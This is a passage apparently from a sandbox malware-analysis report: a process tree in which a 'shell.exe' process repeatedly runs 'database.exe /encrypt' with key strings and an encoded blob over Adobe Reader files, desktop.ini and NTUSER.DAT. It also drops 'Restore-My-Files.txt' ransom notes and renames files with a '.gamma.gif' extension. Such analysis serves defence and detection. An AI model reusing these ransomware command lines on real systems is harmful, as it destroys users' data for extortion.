                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5536
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4424
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3228
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2944
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6776
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5116
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1364
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4012
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7076
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\deployment.properties.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6984
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT"
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG1"
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.dat.LOG2"
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6552
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
